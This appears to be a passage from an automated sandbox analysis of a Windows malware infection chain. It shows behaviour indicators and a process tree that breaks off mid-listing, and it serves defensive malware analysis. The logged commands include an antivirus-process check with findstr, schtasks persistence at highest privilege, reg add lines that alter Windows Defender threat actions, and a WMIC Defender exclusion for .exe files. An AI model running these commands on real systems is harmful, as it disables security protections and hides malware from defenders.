3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
1596	Board.pif
1596	Board.pif
1596	Board.pif
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
4548	msedge.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1044	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 936 wrote to memory of 4752	936	1722448950.190938_setup.exe	81
PID 936 wrote to memory of 4752	936	1722448950.190938_setup.exe	81
PID 936 wrote to memory of 4752	936	1722448950.190938_setup.exe	81
PID 4752 wrote to memory of 3744	4752	cmd.exe	83
PID 4752 wrote to memory of 3744	4752	cmd.exe	83
PID 4752 wrote to memory of 3744	4752	cmd.exe	83
PID 4752 wrote to memory of 3464	4752	cmd.exe	84
PID 4752 wrote to memory of 3464	4752	cmd.exe	84
PID 4752 wrote to memory of 3464	4752	cmd.exe	84
PID 4752 wrote to memory of 4596	4752	cmd.exe	86
PID 4752 wrote to memory of 4596	4752	cmd.exe	86
PID 4752 wrote to memory of 4596	4752	cmd.exe	86
PID 4752 wrote to memory of 5104	4752	cmd.exe	87
PID 4752 wrote to memory of 5104	4752	cmd.exe	87
PID 4752 wrote to memory of 5104	4752	cmd.exe	87
PID 4752 wrote to memory of 1600	4752	cmd.exe	88
PID 4752 wrote to memory of 1600	4752	cmd.exe	88
PID 4752 wrote to memory of 1600	4752	cmd.exe	88
PID 4752 wrote to memory of 2772	4752	cmd.exe	89
PID 4752 wrote to memory of 2772	4752	cmd.exe	89
PID 4752 wrote to memory of 2772	4752	cmd.exe	89
PID 4752 wrote to memory of 3304	4752	cmd.exe	90
PID 4752 wrote to memory of 3304	4752	cmd.exe	90
PID 4752 wrote to memory of 3304	4752	cmd.exe	90
PID 4752 wrote to memory of 1596	4752	cmd.exe	91
PID 4752 wrote to memory of 1596	4752	cmd.exe	91
PID 4752 wrote to memory of 3640	4752	cmd.exe	92
PID 4752 wrote to memory of 3640	4752	cmd.exe	92
PID 4752 wrote to memory of 3640	4752	cmd.exe	92
PID 1596 wrote to memory of 1972	1596	Board.pif	94
PID 1596 wrote to memory of 1972	1596	Board.pif	94
PID 1596 wrote to memory of 1972	1596	Board.pif	94
PID 1596 wrote to memory of 1972	1596	Board.pif	94
PID 1972 wrote to memory of 3344	1972	Board.pif	100
PID 1972 wrote to memory of 3344	1972	Board.pif	100
PID 1972 wrote to memory of 3344	1972	Board.pif	100
PID 1972 wrote to memory of 276	1972	Board.pif	103
PID 1972 wrote to memory of 276	1972	Board.pif	103
PID 1972 wrote to memory of 276	1972	Board.pif	103
PID 1972 wrote to memory of 3372	1972	Board.pif	102
PID 1972 wrote to memory of 3372	1972	Board.pif	102
PID 1972 wrote to memory of 3372	1972	Board.pif	102
PID 1972 wrote to memory of 4244	1972	Board.pif	101
PID 1972 wrote to memory of 4244	1972	Board.pif	101
PID 1972 wrote to memory of 4244	1972	Board.pif	101
PID 4244 wrote to memory of 2708	4244	dkciQqvxxDhgspXZAsA8DUSl.exe	104
PID 4244 wrote to memory of 2708	4244	dkciQqvxxDhgspXZAsA8DUSl.exe	104
PID 4244 wrote to memory of 2708	4244	dkciQqvxxDhgspXZAsA8DUSl.exe	104
PID 2708 wrote to memory of 4472	2708	dkciQqvxxDhgspXZAsA8DUSl.tmp	106
PID 2708 wrote to memory of 4472	2708	dkciQqvxxDhgspXZAsA8DUSl.tmp	106
PID 2708 wrote to memory of 4472	2708	dkciQqvxxDhgspXZAsA8DUSl.tmp	106
PID 3372 wrote to memory of 4820	3372	JbFkuHMjohQtL6R5E8dCZiYU.exe	105
PID 3372 wrote to memory of 4820	3372	JbFkuHMjohQtL6R5E8dCZiYU.exe	105
PID 3372 wrote to memory of 4820	3372	JbFkuHMjohQtL6R5E8dCZiYU.exe	105
PID 3344 wrote to memory of 5000	3344	6aOBJMrivSVxUvnkmLabIsdb.exe	107
PID 3344 wrote to memory of 5000	3344	6aOBJMrivSVxUvnkmLabIsdb.exe	107
PID 3344 wrote to memory of 5000	3344	6aOBJMrivSVxUvnkmLabIsdb.exe	107
PID 2708 wrote to memory of 4896	2708	dkciQqvxxDhgspXZAsA8DUSl.tmp	109
PID 2708 wrote to memory of 4896	2708	dkciQqvxxDhgspXZAsA8DUSl.tmp	109
PID 2708 wrote to memory of 4896	2708	dkciQqvxxDhgspXZAsA8DUSl.tmp	109
PID 276 wrote to memory of 388	276	NSNUTpqiQk13Z4W878vu7iT9.exe	110
PID 276 wrote to memory of 388	276	NSNUTpqiQk13Z4W878vu7iT9.exe	110
PID 276 wrote to memory of 388	276	NSNUTpqiQk13Z4W878vu7iT9.exe	110
PID 3344 wrote to memory of 704	3344	6aOBJMrivSVxUvnkmLabIsdb.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3168
- C:\Users\Admin\AppData\Local\Temp\1722448950.190938_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\1722448950.190938_setup.exe"
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:936
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Vegetation Vegetation.cmd & Vegetation.cmd & exit
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3744
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3464
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4596
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5104
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 82927
      4⤵
      System Location Discovery: System Language Discovery
      PID:1600
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "OlympicsFarmsSportingDescribes" Audio
      4⤵
      System Location Discovery: System Language Discovery
      PID:2772
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Fl + Tb + Invasion + Madrid + Senegal + Mit + Destination + Domain + Packs + Korean + Reasoning + Brunswick + Eric + Festival 82927\p
      4⤵
      System Location Discovery: System Language Discovery
      PID:3304
  - - C:\Users\Admin\AppData\Local\Temp\82927\Board.pif
      Board.pif p
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1596
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      System Location Discovery: System Language Discovery
      PID:3640
- C:\Users\Admin\AppData\Local\Temp\82927\Board.pif
  C:\Users\Admin\AppData\Local\Temp\82927\Board.pif
  2⤵
  - Modifies firewall policy service
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:1972
- - C:\Users\Admin\Documents\piratemamm\6aOBJMrivSVxUvnkmLabIsdb.exe
    C:\Users\Admin\Documents\piratemamm\6aOBJMrivSVxUvnkmLabIsdb.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3344
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5000
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:704
- - C:\Users\Admin\Documents\piratemamm\dkciQqvxxDhgspXZAsA8DUSl.exe
    C:\Users\Admin\Documents\piratemamm\dkciQqvxxDhgspXZAsA8DUSl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4244
  - - C:\Users\Admin\AppData\Local\Temp\is-011F9.tmp\dkciQqvxxDhgspXZAsA8DUSl.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-011F9.tmp\dkciQqvxxDhgspXZAsA8DUSl.tmp" /SL5="$A02CE,3720726,54272,C:\Users\Admin\Documents\piratemamm\dkciQqvxxDhgspXZAsA8DUSl.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Users\Admin\AppData\Local\Quality MP3 Modifier\qualitymp3modifier32_64.exe
        
        "C:\Users\Admin\AppData\Local\Quality MP3 Modifier\qualitymp3modifier32_64.exe" -i
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4472
    - - C:\Users\Admin\AppData\Local\Quality MP3 Modifier\qualitymp3modifier32_64.exe
        
        "C:\Users\Admin\AppData\Local\Quality MP3 Modifier\qualitymp3modifier32_64.exe" -s
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4896
- - C:\Users\Admin\Documents\piratemamm\JbFkuHMjohQtL6R5E8dCZiYU.exe
    C:\Users\Admin\Documents\piratemamm\JbFkuHMjohQtL6R5E8dCZiYU.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3372
  - - C:\Users\Admin\AppData\Local\Temp\7zS83D1.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4820
    - - C:\Users\Admin\AppData\Local\Temp\7zS8B14.tmp\Install.exe
        
        .\Install.exe /xBBdidsuA "525403" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:936
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1156
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:3304
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:8
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2940
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:1456
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2188
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1680
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:3452
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3768
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3932
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:5704
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6000
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5968
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:7416
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:7648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6564
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:7780
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:5720
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:6372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:8184
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7904
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bVxDcMagaMCWGEtnSM" /SC once /ST 19:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8B14.tmp\Install.exe\" 2x /COdidDs 525403 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:6648
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 1028
        6⤵
        Program crash
        
        PID:2772
- - C:\Users\Admin\Documents\piratemamm\NSNUTpqiQk13Z4W878vu7iT9.exe
    C:\Users\Admin\Documents\piratemamm\NSNUTpqiQk13Z4W878vu7iT9.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:276
  - - C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
      "C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:388
    - - C:\Users\Admin\AppData\Local\Temp\1000020001\ebb8298983.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000020001\ebb8298983.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1364
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9D83.tmp\9D84.tmp\9D85.bat C:\Users\Admin\AppData\Local\Temp\1000020001\ebb8298983.exe"
        6⤵
        
        PID:3200
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
        7⤵
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffd4909cc40,0x7ffd4909cc4c,0x7ffd4909cc58
        8⤵
        
        PID:720
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1832,i,12601806630908762697,9423755227499839448,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=1828 /prefetch:2
        8⤵
        
        PID:5144
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,12601806630908762697,9423755227499839448,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2112 /prefetch:3
        8⤵
        
        PID:5164
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1368,i,12601806630908762697,9423755227499839448,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2448 /prefetch:8
        8⤵
        
        PID:5256
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,12601806630908762697,9423755227499839448,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3140 /prefetch:1
        8⤵
        
        PID:6196
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,12601806630908762697,9423755227499839448,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3316 /prefetch:1
        8⤵
        
        PID:6224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
        7⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffd37d23cb8,0x7ffd37d23cc8,0x7ffd37d23cd8
        8⤵
        
        PID:1188
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1724,10391699999816590740,8550008845173982669,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2028 /prefetch:2
        8⤵
        
        PID:2344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,10391699999816590740,8550008845173982669,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1724,10391699999816590740,8550008845173982669,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:8
        8⤵
        
        PID:3352
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10391699999816590740,8550008845173982669,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
        8⤵
        
        PID:1516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10391699999816590740,8550008845173982669,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
        8⤵
        
        PID:428
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10391699999816590740,8550008845173982669,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
        8⤵
        
        PID:7660
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
        7⤵
        
        PID:1112
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1044
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1924 -parentBuildID 20240401114208 -prefsHandle 1864 -prefMapHandle 1856 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fadf6b35-d10d-4266-b805-90975dc9c28c} 1044 "\\.\pipe\gecko-crash-server-pipe.1044" gpu
        9⤵
        
        PID:5528
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
